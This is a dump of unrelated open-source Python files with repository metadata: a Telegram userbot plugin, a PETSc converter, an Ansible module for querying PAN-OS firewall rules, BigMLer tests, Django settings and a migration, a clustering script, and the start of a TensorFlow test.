acdfb9c883b65bd338c5e51bf960cb88491170ae | 469 | py | Python | userbot/plugins/list_reserved_IQ.py | TeleOniOn/TeleOniOn | 9d6c676267e3dd991952e2d7166fac646fe7f2fc | [
"Apache-2.0"
] | null | null | null | userbot/plugins/list_reserved_IQ.py | TeleOniOn/TeleOniOn | 9d6c676267e3dd991952e2d7166fac646fe7f2fc | [
"Apache-2.0"
] | null | null | null | userbot/plugins/list_reserved_IQ.py | TeleOniOn/TeleOniOn | 9d6c676267e3dd991952e2d7166fac646fe7f2fc | [
"Apache-2.0"
] | null | null | null | # For TeleOniOn
# (c) TeleOniOn
from telethon import events, functions, types
import asyncio
@borg.on(events.NewMessage(pattern=r"\-listmyusernames", outgoing=True))
async def _(event):
if event.fwd_from:
return
result = await borg(functions.channels.GetAdminedPublicChannelsRequest())
output_str = ""
for channel_obj in result.chats:
output_str += f"- {channel_obj.title} @{channel_obj.username} \n"
await event.edit(output_str)
| 27.588235 | 77 | 0.716418 |
acdfba2601ebed5085b91a59803059a77004a695 | 781 | py | Python | Benchmarks/petsc/ConvertMtxToPetsc.py | vishalbelsare/CombBLAS | 426f6be0b29831025cdcacc1f8f69e3520bfb0ff | [
"BSD-3-Clause-LBNL"
] | 22 | 2020-08-14T19:14:13.000Z | 2022-02-05T20:14:59.000Z | Benchmarks/petsc/ConvertMtxToPetsc.py | vishalbelsare/CombBLAS | 426f6be0b29831025cdcacc1f8f69e3520bfb0ff | [
"BSD-3-Clause-LBNL"
] | 8 | 2020-10-09T23:23:36.000Z | 2021-08-05T20:35:18.000Z | Benchmarks/petsc/ConvertMtxToPetsc.py | vishalbelsare/CombBLAS | 426f6be0b29831025cdcacc1f8f69e3520bfb0ff | [
"BSD-3-Clause-LBNL"
] | 8 | 2020-12-04T09:10:06.000Z | 2022-01-04T15:37:59.000Z | import os, sys, argparse, logging
from scipy.io import mmread
# change if you use a different dir
sys.path.append('/opt/cray/pe/petsc/3.11.2.0/real/GNU64/8.2/haswell/lib/petsc/bin')
import PetscBinaryIO
parser = argparse.ArgumentParser()
parser.add_argument('matrix')
parser.add_argument('-o', '--outfile')
args = parser.parse_args()
# logging setup
logging.basicConfig(stream=sys.stdout,
format='%(asctime)s ::: %(levelname)s ::: %(filename)s ::: '
'%(funcName)s ::: line %(lineno)d ::: %(message)s',
level=logging.INFO)
A = mmread(args.matrix)
outfile = args.matrix.replace('.mtx', '.petsc')
if (args.outfile != None):
outfile = args.outfile
PetscBinaryIO.PetscBinaryIO().writeMatSciPy(open(outfile,'w'), A)
| 28.925926 | 83 | 0.65557 |
acdfbba4c306ef4570297869478794900cd8e660 | 18,707 | py | Python | library/panos_query_rules.py | rtodto/ansible-pan | b38bfec1883b456a4188112605d24e0e170134f7 | [
"Apache-2.0"
] | 1 | 2019-04-19T23:08:27.000Z | 2019-04-19T23:08:27.000Z | library/panos_query_rules.py | rtodto/ansible-pan | b38bfec1883b456a4188112605d24e0e170134f7 | [
"Apache-2.0"
] | null | null | null | library/panos_query_rules.py | rtodto/ansible-pan | b38bfec1883b456a4188112605d24e0e170134f7 | [
"Apache-2.0"
] | 2 | 2019-01-31T02:51:08.000Z | 2020-09-03T15:45:52.000Z | #!/usr/bin/env python
# Copyright 2017 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_query_rules
short_description: PANOS module that allows search for security rules in PANW NGFW devices.
description: >
- Security policies allow you to enforce rules and take action, and can be as general or specific as needed. The
policy rules are compared against the incoming traffic in sequence, and because the first rule that matches the
traffic is applied, the more specific rules must precede the more general ones.
author: "Bob Hagen (@rnh556)"
version_added: "2.5"
requirements:
- pan-python can be obtained from PyPi U(https://pypi.python.org/pypi/pan-python)
- pandevice can be obtained from PyPi U(https://pypi.python.org/pypi/pandevice)
- xmltodict can be obtains from PyPi U(https://pypi.python.org/pypi/xmltodict)
notes:
- Checkmode is not supported.
- Panorama is supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS firewall or Panorama management console being queried.
required: true
username:
description:
- Username credentials to use for authentication.
required: false
default: "admin"
password:
description:
- Password credentials to use for authentication.
required: true
api_key:
description:
- API key that can be used instead of I(username)/I(password) credentials.
application:
description:
- Name of the application or application group to be queried.
required: false
default: None
source_zone:
description:
- Name of the source security zone to be queried.
required: false
default: None
source_ip:
description:
- The source IP address to be queried.
required: false
default: None
source_port:
description:
- The source port to be queried.
required: false
default: None
destination_zone:
description:
- Name of the destination security zone to be queried.
required: false
default: None
destination_ip:
description:
- The destination IP address to be queried.
required: false
default: None
destination_port:
description:
- The destination port to be queried.
required: false
default: None
protocol:
description:
- The protocol used to be queried. Must be either I(tcp) or I(udp).
required: false
default: None
tag_name:
description:
- Name of the rule tag to be queried.
required: false
default: None
devicegroup:
description:
- The Panorama device group in which to conduct the query.
required: false
default: None
'''
EXAMPLES = '''
- name: search for rules with tcp/3306
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
source_zone: 'DevNet'
destination_zone: 'DevVPC'
destination_port: '3306'
protocol: 'tcp'
- name: search devicegroup for inbound rules to dmz host
panos_query_rules:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
destination_zone: 'DMZ'
destination_ip: '10.100.42.18'
address: 'DeviceGroupA'
- name: search for rules containing a specified rule tag
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
tag_name: 'ProjectX'
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
import pan.xapi
from pan.xapi import PanXapiError
import pandevice
from pandevice import base
from pandevice import firewall
from pandevice import panorama
from pandevice import objects
from pandevice import policies
import ipaddress
import xmltodict
import json
HAS_LIB = True
except ImportError:
HAS_LIB = False
def get_devicegroup(device, devicegroup):
dg_list = device.refresh_devices()
for group in dg_list:
if isinstance(group, pandevice.panorama.DeviceGroup):
if group.name == devicegroup:
return group
return False
def get_rulebase(device, devicegroup):
# Build the rulebase
if isinstance(device, firewall.Firewall):
rulebase = policies.Rulebase()
device.add(rulebase)
elif isinstance(device, panorama.Panorama):
dg = panorama.DeviceGroup(devicegroup)
device.add(dg)
rulebase = policies.PreRulebase()
dg.add(rulebase)
else:
return False
policies.SecurityRule.refreshall(rulebase)
return rulebase
def get_object(device, dev_group, obj_name):
# Search global address objects
match = device.find(obj_name, objects.AddressObject)
if match:
return match
# Search global address groups
match = device.find(obj_name, objects.AddressGroup)
if match:
return match
# Search Panorama device group
if isinstance(device, pandevice.panorama.Panorama):
# Search device group address objects
match = dev_group.find(obj_name, objects.AddressObject)
if match:
return match
# Search device group address groups
match = dev_group.find(obj_name, objects.AddressGroup)
if match:
return match
return False
def addr_in_obj(addr, obj):
ip = ipaddress.ip_address(addr)
# Process address objects
if isinstance(obj, objects.AddressObject):
if obj.type == 'ip-netmask':
net = ipaddress.ip_network(obj.value)
if ip in net:
return True
if obj.type == 'ip-range':
ip_range = obj.value.split('-')
lower = ipaddress.ip_address(ip_range[0])
upper = ipaddress.ip_address(ip_range[1])
if lower < ip < upper:
return True
return False
def get_services(device, dev_group, svc_list, obj_list):
for svc in svc_list:
# Search global address objects
global_obj_match = device.find(svc, objects.ServiceObject)
if global_obj_match:
obj_list.append(global_obj_match)
# Search global address groups
global_grp_match = device.find(svc, objects.ServiceGroup)
if global_grp_match:
get_services(device, dev_group, global_grp_match.value, obj_list)
# Search Panorama device group
if isinstance(device, pandevice.panorama.Panorama):
# Search device group address objects
dg_obj_match = dev_group.find(svc, objects.ServiceObject)
if dg_obj_match:
obj_list.append(dg_obj_match)
# Search device group address groups
dg_grp_match = dev_group.find(svc, objects.ServiceGroup)
if dg_grp_match:
get_services(device, dev_group, dg_grp_match.value, obj_list)
return obj_list
def port_in_svc(orientation, port, protocol, obj):
# Process address objects
if orientation is 'source':
for x in obj.source_port.split(','):
if '-' in x:
port_range = x.split('-')
lower = int(port_range[0])
upper = int(port_range[1])
if (lower <= int(port) <= upper) and (obj.protocol == protocol):
return True
else:
if port == x and obj.protocol == protocol:
return True
elif orientation is 'destination':
for x in obj.destination_port.split(','):
if '-' in x:
port_range = x.split('-')
lower = int(port_range[0])
upper = int(port_range[1])
if (lower <= int(port) <= upper) and (obj.protocol == protocol):
return True
else:
if port == x and obj.protocol == protocol:
return True
return False
def get_tag(device, dev_group, tag_name):
# Search global address objects
match = device.find(tag_name, objects.Tag)
if match:
return match
# Search Panorama device group
if isinstance(device, panorama.Panorama):
# Search device group address objects
match = dev_group.find(tag_name, objects.Tag)
if match:
return match
return False
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(no_log=True),
username=dict(default='admin'),
api_key=dict(no_log=True),
application=dict(default=None),
source_zone=dict(default=None),
destination_zone=dict(default=None),
source_ip=dict(default=None),
destination_ip=dict(default=None),
source_port=dict(default=None),
destination_port=dict(default=None),
protocol=dict(default=None, choices=['tcp', 'udp']),
tag_name=dict(default=None),
devicegroup=dict(default=None)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,
required_one_of=[['api_key', 'password']]
)
if not HAS_LIB:
module.fail_json(msg='Missing required libraries.')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
api_key = module.params['api_key']
application = module.params['application']
source_zone = module.params['source_zone']
source_ip = module.params['source_ip']
source_port = module.params['source_port']
destination_zone = module.params['destination_zone']
destination_ip = module.params['destination_ip']
destination_port = module.params['destination_port']
protocol = module.params['protocol']
tag_name = module.params['tag_name']
devicegroup = module.params['devicegroup']
# Create the device with the appropriate pandevice type
device = base.PanDevice.create_from_device(ip_address, username, password, api_key=api_key)
# Grab the global objects
objects.AddressObject.refreshall(device)
objects.AddressGroup.refreshall(device)
objects.ServiceObject.refreshall(device)
objects.ServiceGroup.refreshall(device)
objects.Tag.refreshall(device)
# If Panorama, validate the devicegroup and grab the devicegroup objects
dev_group = None
if devicegroup and isinstance(device, panorama.Panorama):
dev_group = get_devicegroup(device, devicegroup)
if dev_group:
device.add(dev_group)
objects.AddressObject.refreshall(dev_group)
objects.AddressGroup.refreshall(dev_group)
objects.ServiceObject.refreshall(dev_group)
objects.ServiceGroup.refreshall(dev_group)
objects.Tag.refreshall(dev_group)
else:
module.fail_json(
failed=1,
msg='\'%s\' device group not found in Panorama. Is the name correct?' % devicegroup
)
# Build the rulebase and produce list
rulebase = get_rulebase(device, dev_group)
rulelist = rulebase.children
hitbase = policies.Rulebase()
loose_match = True
# Process each rule
for rule in rulelist:
hitlist = []
if source_zone:
source_zone_match = False
if loose_match and 'any' in rule.fromzone:
source_zone_match = True
else:
for object_string in rule.fromzone:
if object_string == source_zone:
source_zone_match = True
hitlist.append(source_zone_match)
if destination_zone:
destination_zone_match = False
if loose_match and 'any' in rule.tozone:
destination_zone_match = True
else:
for object_string in rule.tozone:
if object_string == destination_zone:
destination_zone_match = True
hitlist.append(destination_zone_match)
if source_ip:
source_ip_match = False
if loose_match and 'any' in rule.source:
source_ip_match = True
else:
for object_string in rule.source:
# Get a valid AddressObject or AddressGroup
obj = get_object(device, dev_group, object_string)
# Otherwise the object_string is not an object and should be handled differently
if obj is False:
if '-' in object_string:
obj = ipaddress.ip_address(source_ip)
source_range = object_string.split('-')
source_lower = ipaddress.ip_address(source_range[0])
source_upper = ipaddress.ip_address(source_range[1])
if source_lower <= obj <= source_upper:
source_ip_match = True
else:
if source_ip == object_string:
source_ip_match = True
if isinstance(obj, objects.AddressObject) and addr_in_obj(source_ip, obj):
source_ip_match = True
elif isinstance(obj, objects.AddressGroup) and obj.static_value:
for member_string in obj.static_value:
member = get_object(device, dev_group, member_string)
if addr_in_obj(source_ip, member):
source_ip_match = True
hitlist.append(source_ip_match)
if destination_ip:
destination_ip_match = False
if loose_match and 'any' in rule.destination:
destination_ip_match = True
else:
for object_string in rule.destination:
# Get a valid AddressObject or AddressGroup
obj = get_object(device, dev_group, object_string)
# Otherwise the object_string is not an object and should be handled differently
if obj is False:
if '-' in object_string:
obj = ipaddress.ip_address(destination_ip)
destination_range = object_string.split('-')
destination_lower = ipaddress.ip_address(destination_range[0])
destination_upper = ipaddress.ip_address(destination_range[1])
if destination_lower <= obj <= destination_upper:
destination_ip_match = True
else:
if destination_ip == object_string:
destination_ip_match = True
if isinstance(obj, objects.AddressObject) and addr_in_obj(destination_ip, obj):
destination_ip_match = True
elif isinstance(obj, objects.AddressGroup) and obj.static_value:
for member_string in obj.static_value:
member = get_object(device, dev_group, member_string)
if addr_in_obj(destination_ip, member):
destination_ip_match = True
hitlist.append(destination_ip_match)
if source_port:
source_port_match = False
orientation = 'source'
if loose_match and (rule.service[0] == 'any'):
source_port_match = True
elif rule.service[0] == 'application-default':
source_port_match = False # Fix this once apps are supported
else:
service_list = []
service_list = get_services(device, dev_group, rule.service, service_list)
for obj in service_list:
if port_in_svc(orientation, source_port, protocol, obj):
source_port_match = True
break
hitlist.append(source_port_match)
if destination_port:
destination_port_match = False
orientation = 'destination'
if loose_match and (rule.service[0] == 'any'):
destination_port_match = True
elif rule.service[0] == 'application-default':
destination_port_match = False # Fix this once apps are supported
else:
service_list = []
service_list = get_services(device, dev_group, rule.service, service_list)
for obj in service_list:
if port_in_svc(orientation, destination_port, protocol, obj):
destination_port_match = True
break
hitlist.append(destination_port_match)
if tag_name:
tag_match = False
if rule.tag:
for object_string in rule.tag:
obj = get_tag(device, dev_group, object_string)
if obj and (obj.name == tag_name):
tag_match = True
hitlist.append(tag_match)
# Add to hit rulebase
if False not in hitlist:
hitbase.add(rule)
# Dump the hit rulebase
if hitbase.children:
output_string = xmltodict.parse(hitbase.element_str())
module.exit_json(
stdout_lines=json.dumps(output_string, indent=2),
msg='%s of %s rules matched' % (hitbase.children.__len__(), rulebase.children.__len__())
)
else:
module.fail_json(msg='No matching rules found.')
if __name__ == '__main__':
main()
| 36.970356 | 116 | 0.603304 |
acdfbbca6a39e4d9d94dfe8ef9a653618bc754f6 | 9,872 | py | Python | bigmler/tests/test_42_composites.py | jaor/bigmler | cd06940a3eac1f49ce9df36864dfd1882782be7e | [
"Apache-2.0"
] | null | null | null | bigmler/tests/test_42_composites.py | jaor/bigmler | cd06940a3eac1f49ce9df36864dfd1882782be7e | [
"Apache-2.0"
] | null | null | null | bigmler/tests/test_42_composites.py | jaor/bigmler | cd06940a3eac1f49ce9df36864dfd1882782be7e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2021 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Testing fusion predictions creation
"""
import os
from bigmler.tests.world import (world, common_setup_module,
common_teardown_module,
teardown_class)
import bigmler.tests.composite_steps as composite_create
import bigmler.tests.basic_tst_prediction_steps as source_create
def setup_module():
"""Setup for the module
"""
common_setup_module()
def teardown_module():
"""Teardown for the module
"""
common_teardown_module()
class TestComposite(object):
def setup(self):
"""
Debug information
"""
print("\n-------------------\nTests in: %s\n" % __name__)
def teardown(self):
"""Calling generic teardown for every method
"""
self.world = teardown_class()
print("\nEnd of tests in: %s\n-------------------\n" % __name__)
def test_scenario01(self):
"""
Scenario: Successfully building a composite
And I create a source from "<data>"
And I check that the source is ready
And I create an composite with the source
And I check that the composite is ready
And I check that the source is a composite component
And I remove the source from the composite
And I check that the composite is empty
"""
print(self.test_scenario01.__doc__)
examples = [
['data/iris.csv', './scenario41_01']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_create_source( \
self, data=example[0], output_dir=example[1])
source_create.i_check_create_source(self)
self.sources = [world.source["resource"]]
composite_create.i_create_composite_from_sources( \
self, sources=",".join(self.sources), output_dir=example[1])
composite_create.i_check_create_composite(self)
composite_create.check_sources_in_composite(self)
composite_create.remove_sources(self, output_dir=example[1])
composite_create.i_check_create_composite(self)
self.source = self.sources[0]
self.sources = []
composite_create.check_sources_in_composite(self)
source_create.check_source_exists(self, exists=True)
def test_scenario02(self):
"""
Scenario: Successfully building a composite and adding sources
And I create a source from "<data>"
And I check that the source is ready
And I create an empty composite and add the source
And I check that the composite is ready
And I check that the source is a composite component
"""
print(self.test_scenario02.__doc__)
examples = [
['data/iris.csv', './scenario41_02']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_create_source( \
self, data=example[0], output_dir=example[1])
source_create.i_check_create_source(self)
self.sources = [world.source["resource"]]
composite_create.i_create_empty_composite_and_add_source( \
self, add_sources=",".join(self.sources),
output_dir=example[1])
composite_create.i_check_create_composite(self)
composite_create.check_sources_in_composite(self)
def test_scenario03(self):
"""
Scenario: Successfully building a composite
And I create a source from "<data>"
And I check that the source is ready
And I create an composite with the source
And I check that the composite is ready
And I check that the source is a composite component
And I remove the source from the composite
And I check that the composite is empty
"""
print(self.test_scenario03.__doc__)
examples = [
['data/iris.csv', './scenario41_03']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_create_source( \
self, data=example[0], output_dir=example[1])
source_create.i_check_create_source(self)
self.sources = [world.source["resource"]]
composite_create.i_create_composite_from_sources( \
self, sources=",".join(self.sources), output_dir=example[1])
composite_create.i_check_create_composite(self)
composite_create.check_sources_in_composite(self)
composite_create.delete_sources(self, output_dir=example[1])
composite_create.i_check_create_composite(self)
self.source = self.sources[0]
self.sources = []
composite_create.check_sources_in_composite(self)
source_create.check_source_exists(self, exists=False)
def test_scenario04(self):
"""
Scenario: Successfully building an images composite
And I create a source from a "<zip>" of "<images_number>" images
And I check that the composite is ready
And I check that it has "<images_number>" components
"""
print(self.test_scenario04.__doc__)
examples = [
['data/images/fruits_hist.zip', './scenario41_04']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_create_source( \
self, data=example[0], output_dir=example[1])
composite_create.i_check_create_composite(self)
self.sources = world.source["object"].get("sources", [])
composite_create.check_images_number_in_composite(self,
example[0])
def test_scenario05(self):
"""
Scenario: Successfully building an images composite from directory
And I create a source from a "<directory>" of "<images_number>" images
And I check that the composite is ready
And I check that it has "<images_number>" components
"""
print(self.test_scenario05.__doc__)
examples = [
['data/images/fruits_hist/', './scenario41_05']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_create_source( \
self, data=example[0], output_dir=example[1])
composite_create.i_check_create_composite(self)
self.sources = world.source["object"].get("sources", [])
composite_create.check_images_number_in_composite(self,
example[0])
def test_scenario06(self):
"""
Scenario: Successfully building an annotated images composite
And I create a source from an "<annotations_file>" and an "<images_file>"
And I check that the composite is ready
And I check that it has "<annotation_fields>"
"""
print(self.test_scenario06.__doc__)
examples = [
['data/images/fruits_hist.zip', 'data/images/annotations.json',
'./scenario41_06']]
for example in examples:
print("\nTesting with:\n", example)
composite_create.i_create_annotated_source( \
self, images_file=example[0], annotations_file=example[1],
output_dir=example[2])
composite_create.i_check_create_composite(self)
self.sources = world.source["object"].get("sources", [])
composite_create.check_images_number_in_composite(self,
example[0])
composite_create.check_annotation_fields(self, example[1])
def test_scenario07(self):
"""
Scenario: Successfully building a <annotations_language> annotated images composite
And I create a source from an "<annotations_dir>" and an "<images_dir>"
And I check that the composite is ready
And I check that it has "<annotation_fields>"
"""
print(self.test_scenario07.__doc__)
examples = [
['data/images/fruits_hist', 'data/images/VOC_annotations',
'./scenario41_07', 'VOC'],
['data/images/YOLO_annotations', 'data/images/YOLO_annotations',
'./scenario41_07', 'YOLO']]
for example in examples:
print("\nTesting with:\n", example)
composite_create.i_create_lang_annotated_source( \
self, images_dir=example[0], annotations_dir=example[1],
annotations_language=example[3],
output_dir=example[2])
composite_create.i_check_create_composite(self)
self.sources = world.source["object"].get("sources", [])
composite_create.check_images_number_in_composite(self,
example[0])
composite_create.check_annotation_fields(
self,
os.path.join(example[2], "annotations.json"))
| 40.130081 | 91 | 0.606767 |
acdfbbd9dd87deb877c17d1e536ac90dd8bc5b1b | 3,412 | py | Python | app/app/settings.py | jaramosperez/recipe-app-api | 865b4d50bede8544aa77f2f09c4429922ec0bfd2 | [
"MIT"
] | 1 | 2020-09-10T03:03:22.000Z | 2020-09-10T03:03:22.000Z | app/app/settings.py | jaramosperez/recipe-app-api | 865b4d50bede8544aa77f2f09c4429922ec0bfd2 | [
"MIT"
] | null | null | null | app/app/settings.py | jaramosperez/recipe-app-api | 865b4d50bede8544aa77f2f09c4429922ec0bfd2 | [
"MIT"
] | null | null | null | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c)hha!zoz9))wu75@^8vnmjghl0ij8kot2jt-0pz2!oc)bri_4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
'recipe',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = '/vol/web/media'
STATIC_ROOT = '/vol/web/static'
AUTH_USER_MODEL = 'core.User' | 25.462687 | 91 | 0.686987 |
acdfbc8febb6b66272c1a876c6255b1290f3f4c6 | 974 | py | Python | src/models/tests/test_prequential.py | cseveriano/evolving_clustering | 50dd2b4e38ee11aba9382f1a8e04f530b7c9c949 | [
"MIT"
] | 5 | 2018-11-16T21:04:11.000Z | 2020-12-04T22:09:23.000Z | src/models/tests/test_prequential.py | cseveriano/evolving_clustering | 50dd2b4e38ee11aba9382f1a8e04f530b7c9c949 | [
"MIT"
] | null | null | null | src/models/tests/test_prequential.py | cseveriano/evolving_clustering | 50dd2b4e38ee11aba9382f1a8e04f530b7c9c949 | [
"MIT"
] | 1 | 2020-12-09T02:25:49.000Z | 2020-12-09T02:25:49.000Z | from sklearn import preprocessing
from evolving import EvolvingClustering, util
from evolving.util import Metrics, Benchmarks, load_dataset
import matplotlib.pyplot as plt
import numpy as np
X, y = load_dataset.load_dataset("gaussian")
standardized_X = preprocessing.scale(X)
minmaxscaler = preprocessing.MinMaxScaler()
minmaxscaler.fit(standardized_X)
X = minmaxscaler.transform(standardized_X)
#y = np.array([el[0] for el in y])
evol_model = EvolvingClustering.EvolvingClustering(variance_limit=0.001, decay=1000, debug=True)
nsamples = 6000
train_size = 1000
window_size = 1000
X = X[:nsamples,:2]
y = y[:nsamples]
result = Benchmarks.prequential_evaluation(evol_model, X, y, Metrics.precision, train_size, window_size, elapsed_time=True)
util.plot_macro_clusters(X, evol_model)
fig = plt.figure(figsize=(14,6))
windows = np.arange(train_size+window_size,nsamples+window_size,window_size)
plt.plot(windows,result['error_list'],'o-', color='blue',label='Evolving') | 32.466667 | 123 | 0.793634 |
acdfbc9267e725f760a09d0ce5324552c86472b2 | 1,935 | py | Python | taxinnovation/apps/catalogs/migrations/0002_auto_20200807_1714.py | rootUserM/Docekerfiles-examples | b2b2e6b8cd37f699bd182a358d472deff5eb1921 | [
"CC-BY-3.0"
] | null | null | null | taxinnovation/apps/catalogs/migrations/0002_auto_20200807_1714.py | rootUserM/Docekerfiles-examples | b2b2e6b8cd37f699bd182a358d472deff5eb1921 | [
"CC-BY-3.0"
] | null | null | null | taxinnovation/apps/catalogs/migrations/0002_auto_20200807_1714.py | rootUserM/Docekerfiles-examples | b2b2e6b8cd37f699bd182a358d472deff5eb1921 | [
"CC-BY-3.0"
] | null | null | null | # Generated by Django 3.0.8 on 2020-08-07 22:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('catalogs', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='postalcodecatalog',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, help_text='Fecha en que el registro fue creado.', verbose_name='Fecha de creación'),
preserve_default=False,
),
migrations.AddField(
model_name='postalcodecatalog',
name='created_by',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='catalogs_postalcodecatalog_created', to=settings.AUTH_USER_MODEL, verbose_name='Usuario creador'),
),
migrations.AddField(
model_name='postalcodecatalog',
name='is_active',
field=models.BooleanField(default=True, help_text=('Indica si el registro debe ser tratado como activo.', 'Desmarque esta opción en lugar de borrar el registro'), verbose_name='active'),
),
migrations.AddField(
model_name='postalcodecatalog',
name='modified_at',
field=models.DateTimeField(auto_now=True, help_text='Última fecha en que el registro fue modificado', verbose_name='Ultima modificación'),
),
migrations.AddField(
model_name='postalcodecatalog',
name='modified_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='catalogs_postalcodecatalog_modified', to=settings.AUTH_USER_MODEL, verbose_name='Usuario editor'),
),
]
| 43.977273 | 204 | 0.68062 |
acdfbdbdd5218772f90a82012b9d3326207eada6 | 5,923 | py | Python | research/im2txt/im2txt/ops/image_embedding_test.py | Dzinushi/models_1_4 | d7e72793a68c1667d403b1542c205d1cd9b1d17c | [
"Apache-2.0"
] | null | null | null | research/im2txt/im2txt/ops/image_embedding_test.py | Dzinushi/models_1_4 | d7e72793a68c1667d403b1542c205d1cd9b1d17c | [
"Apache-2.0"
] | null | null | null | research/im2txt/im2txt/ops/image_embedding_test.py | Dzinushi/models_1_4 | d7e72793a68c1667d403b1542c205d1cd9b1d17c | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow_models.im2txt.ops.image_embedding."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from im2txt.ops import image_embedding
class InceptionV3Test(tf.test.TestCase):
def setUp(self):
super(InceptionV3Test, self).setUp()
batch_size = 4
height = 299
width = 299
num_channels = 3
self._images = tf.placeholder(tf.float32,
[batch_size, height, width, num_channels])
self._batch_size = batch_size
def _countInceptionParameters(self):
"""Counts the number of parameters in the inception model at top scope."""
counter = {}
for v in tf.global_variables():
name_tokens = v.op.name.split("/")
if name_tokens[0] == "InceptionV3":
name = "InceptionV3/" + name_tokens[1]
num_params = v.get_shape().num_elements()
assert num_params
counter[name] = counter.get(name, 0) + num_params
return counter
def _verifyParameterCounts(self):
"""Verifies the number of parameters in the inception model."""
param_counts = self._countInceptionParameters()
expected_param_counts = {
"InceptionV3/Conv2d_1a_3x3": 960,
"InceptionV3/Conv2d_2a_3x3": 9312,
